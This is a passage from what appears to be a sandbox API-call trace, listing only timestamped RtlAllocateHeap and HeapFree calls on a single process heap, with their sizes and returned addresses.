Size=0x4) returned 0x683308 [0071.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6832f8 | out: hHeap=0x650000) returned 1 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6838d8 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6838f0 [0071.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838a8 | out: hHeap=0x650000) returned 1 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6838a8 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1c) returned 0x6767a0 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683908 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x6767f0 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6832f8 [0071.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6767a0 | out: hHeap=0x650000) returned 1 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683920 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683938 [0071.108] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683908 | out: hHeap=0x650000) returned 1 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683908 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683950 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683968 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683980 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683998 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xac) returned 0x683c00 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6839b0 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6839c8 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6839e0 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6839f8 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683a10 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683a28 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683a40 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683a58 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683a70 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683a88 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683aa0 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683ab8 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683ad0 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683cd0 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683ce8 [0071.108] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683d00 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683d18 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683d30 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683d48 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683d60 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683d78 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683d90 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683da8 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683dc0 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683dd8 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683df0 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683e08 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683e20 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683e38 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683e50 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683e68 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683e80 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683e98 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683eb0 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683ec8 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683ee0 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683ef8 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683f10 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683f28 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683f40 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683f58 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683f70 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683f88 [0071.109] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683fa0 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683fb8 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683fd0 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683fe8 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x684000 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x684018 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x684030 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x684048 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x684060 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x684078 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x684090 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6840d0 [0071.110] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6840e8 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a900 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a9c0 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a9a8 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a990 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa20 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a9d8 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a9f0 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa80 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa38 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa50 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aae0 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aac8 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa98 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab28 | out: hHeap=0x650000) returned 1 [0071.110] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab10 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aaf8 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab40 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab58 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abb8 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab70 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab88 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abd0 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abe8 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac48 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac00 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac18 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac60 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac78 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683710 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac90 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aca8 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683728 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683740 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683788 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683770 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683758 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837a0 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837b8 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683818 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837d0 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837e8 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683830 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683848 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683890 | out: hHeap=0x650000) returned 1 [0071.111] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683878 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683860 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838f0 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838d8 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838a8 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683938 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683920 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683908 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683950 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683968 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683980 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683998 | out: hHeap=0x650000) returned 1 [0071.112] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683998 [0071.112] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683980 [0071.112] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683318 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683980 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683318 | out: hHeap=0x650000) returned 1 [0071.112] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683998 | out: hHeap=0x650000) returned 1 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683998 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x67a750 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683980 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x6767a0 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683318 [0071.113] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a750 | out: hHeap=0x650000) returned 1 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683968 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683950 [0071.113] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683980 | out: hHeap=0x650000) returned 1 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683980 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676818 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683908 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683920 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683938 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6838a8 [0071.113] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683998 | out: hHeap=0x650000) returned 1 [0071.113] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683950 | out: hHeap=0x650000) returned 1 [0071.113] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683968 | out: hHeap=0x650000) returned 1 [0071.113] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683980 | out: hHeap=0x650000) returned 1 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x6) returned 0x683328 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683980 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683338 [0071.113] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683980 | out: hHeap=0x650000) returned 1 [0071.113] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683338 | out: hHeap=0x650000) returned 1 [0071.113] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683328 | out: hHeap=0x650000) returned 1 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683980 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683968 [0071.113] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683950 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683998 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683328 [0071.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683968 | out: hHeap=0x650000) returned 1 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683968 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6838d8 [0071.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683950 | out: hHeap=0x650000) returned 1 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683950 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683338 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6838f0 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683860 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683348 [0071.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683338 | out: hHeap=0x650000) returned 1 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683878 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683890 [0071.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838f0 | out: hHeap=0x650000) returned 1 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x6838f0 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683848 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683338 [0071.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683848 | out: hHeap=0x650000) returned 1 [0071.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683338 | out: hHeap=0x650000) returned 1 [0071.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838f0 | out: hHeap=0x650000) returned 1 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6838f0 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xe) returned 0x683848 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683830 [0071.114] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683338 [0071.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683830 | out: hHeap=0x650000) returned 1 [0071.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683338 | out: hHeap=0x650000) returned 1 [0071.114] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683848 | out: hHeap=0x650000) returned 1 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683848 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x12) returned 0x67a750 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676840 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683338 [0071.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676840 | out: hHeap=0x650000) returned 1 [0071.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683338 | out: hHeap=0x650000) returned 1 [0071.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a750 | out: hHeap=0x650000) returned 1 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683830 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6837e8 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6837d0 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683818 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6837b8 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6837a0 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x2) returned 0x683338 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683758 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683770 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683358 [0071.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683338 | out: hHeap=0x650000) returned 1 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683788 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683740 [0071.115] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683758 | out: hHeap=0x650000) returned 1 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683758 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683728 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x3c) returned 0x662388 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683710 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x684100 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x684118 [0071.115] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x684130 [0071.116] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x684148 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683980 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838d8 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683968 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683950 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683890 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683878 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838f0 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683848 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683830 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837e8 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837d0 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683818 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837b8 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837a0 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683740 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683788 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683758 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683728 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683728 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683368 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683338 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683758 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683368 | out: hHeap=0x650000) returned 1 [0071.116] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683338 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676840 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683338 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a750 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837a0 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837b8 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683830 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683368 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837e8 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683848 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683368 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683830 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676840 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683368 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a750 | out: hHeap=0x650000) returned 